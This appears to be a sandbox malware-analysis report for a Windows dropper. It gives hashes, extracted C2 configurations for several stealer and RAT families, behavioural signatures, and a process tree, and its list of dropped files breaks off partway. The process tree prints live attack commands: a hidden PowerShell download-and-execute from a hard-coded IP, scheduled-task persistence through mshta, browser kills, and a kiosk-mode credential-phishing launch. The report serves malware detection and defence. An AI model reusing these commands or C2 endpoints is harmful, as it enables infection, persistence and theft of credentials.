Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 23:34

General

  • Target

    19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe

  • Size

    938KB

  • MD5

    5a97dfa3080fd5ff60f22c76d10151aa

  • SHA1

    ae3c5b370fdc8e87ecf3f7ce53c9de85033a8904

  • SHA256

    19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288

  • SHA512

    a9a7552369cc727a67b21e521db17c6d7f58d46abf3151ef2fe7ff4d796a5980a3e7c83ba4344481dcdc61da6fb04a095f43456827832661e9bdf4763b2a7fed

  • SSDEEP

    24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a07u:TTvC/MTQYxsWR7a07

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 5 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 19 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
    "C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1784
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1904
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
          "C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2352
            • C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
              "C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3044
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1412
            • C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
              "C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:984
              • C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
                "C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1548
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1020
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2100
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 508
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1740
            • C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
              "C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2552
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1828
            • C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe
              "C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:2384
            • C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe
              "C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2648
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1204
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1888
            • C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe
              "C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1676
            • C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe
              "C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1612
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3024
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2892
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:316
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:892
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2000
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:1452
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2840
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.994059294\268589583" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6286e659-a441-4882-a98a-0a5ee3cdc511} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1292 b6ba358 gpu
                      9⤵
                        PID:2108
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.650304462\1396595912" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ef407-e24a-4d03-8b85-0c5c0aa613a5} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1500 d73f58 socket
                        9⤵
                          PID:1304
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.2.1799686709\1027310904" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 2064 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5363fbb2-0994-4857-95eb-e7a2926154be} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2080 19da9058 tab
                          9⤵
                            PID:1492
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.3.550897298\1798261468" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f518dac-b087-470d-9016-eaf44777df06} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2916 d62d58 tab
                            9⤵
                              PID:1220
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.4.931231338\790430380" -childID 3 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d67aeed-8ac1-42bd-b36f-e1fad7f623f6} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 3956 208dad58 tab
                              9⤵
                                PID:1176
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.5.1751415405\1535557933" -childID 4 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8717bd4e-e160-44c8-ab53-2f49ecb2f066} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4052 208db058 tab
                                9⤵
                                  PID:1204
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.6.701966344\1456685151" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2376d85f-4b17-4b2b-a188-0facedd92900} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4216 20ef7b58 tab
                                  9⤵
                                    PID:884
                            • C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2972
                            • C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"
                              6⤵
                              • Drops startup file
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              PID:3160
                            • C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of FindShellTrayWindow
                              PID:3384
                              • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3464
                            • C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3808
                            • C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Modifies system certificate store
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2460
                            • C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3644
                              • C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe
                                C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:4044
                            • C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe
                              "C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              PID:3448
                              • C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe
                                "C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3548
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 500
                                7⤵
                                • Loads dropped DLL
                                • Program crash
                                PID:1364
                            • C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe
                              "C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3864
                            • C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
                              "C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              PID:3672
                              • C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
                                "C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3696
                              • C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
                                "C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3728
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 1032
                                  8⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:3920
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 512
                                7⤵
                                • Loads dropped DLL
                                • Program crash
                                PID:3788

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\50E370761CD6C8DF.dat

                    Filesize

                    46KB

                    MD5

                    02d2c46697e3714e49f46b680b9a6b83

                    SHA1

                    84f98b56d49f01e9b6b76a4e21accf64fd319140

                    SHA256

                    522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                    SHA512

                    60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                    Filesize

                    71KB

                    MD5

                    83142242e97b8953c386f988aa694e4a

                    SHA1

                    833ed12fc15b356136dcdd27c61a50f59c5c7d50

                    SHA256

                    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                    SHA512

                    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CXRG2YQS\service[1].htm

                    Filesize

                    1B

                    MD5

                    cfcd208495d565ef66e7dff9f98764da

                    SHA1

                    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                    SHA256

                    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                    SHA512

                    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

                    Filesize

                    23KB

                    MD5

                    29840b80836cf007cb87c5155f230588

                    SHA1

                    00a0dcc50281e0fcbf6cfbc06647a19e3afc565c

                    SHA256

                    9967b9a45f6f608bdc8c673518b4df82c01d0c5bd9dc77ccabdaef0ff3fe90f1

                    SHA512

                    6e0ded07a22baa41269d93e053e6406ac7bc525c04f1f510b4c64e18bf321181dfa49fb525bde210b5d1742ee94ef350a16dbe04458fdcaad5a17649b2a08617

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                    Filesize

                    15KB

                    MD5

                    96c542dec016d9ec1ecc4dddfcbaac66

                    SHA1

                    6199f7648bb744efa58acf7b96fee85d938389e4

                    SHA256

                    7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                    SHA512

                    cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                  • C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE

                    Filesize

                    1.8MB

                    MD5

                    b5db83c03a37b4cd4746a6080133e338

                    SHA1

                    edf3f7e5c3bda89e1382df8f7d0443783426c834

                    SHA256

                    8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df

                    SHA512

                    e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

                  • C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe

                    Filesize

                    3.7MB

                    MD5

                    d054bcb257edeee50293394229ab1c67

                    SHA1

                    80f84013bdc91aa820a0534a297be285e9f0c9f8

                    SHA256

                    b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e

                    SHA512

                    ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26

                  • C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

                    Filesize

                    445KB

                    MD5

                    c83ea72877981be2d651f27b0b56efec

                    SHA1

                    8d79c3cd3d04165b5cd5c43d6f628359940709a7

                    SHA256

                    13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

                    SHA512

                    d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

                  • C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

                    Filesize

                    4.5MB

                    MD5

                    5d153f73ce1b6a907cf87ddb04ba12b2

                    SHA1

                    bfda9ee8501ae0ca60f8e1803efea482085bf699

                    SHA256

                    2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c

                    SHA512

                    0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

                  • C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe

                    Filesize

                    1.8MB

                    MD5

                    8538c195a09066478922511ea1a02edf

                    SHA1

                    15e8910df845d897b4bb163caef4c6112570855b

                    SHA256

                    d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96

                    SHA512

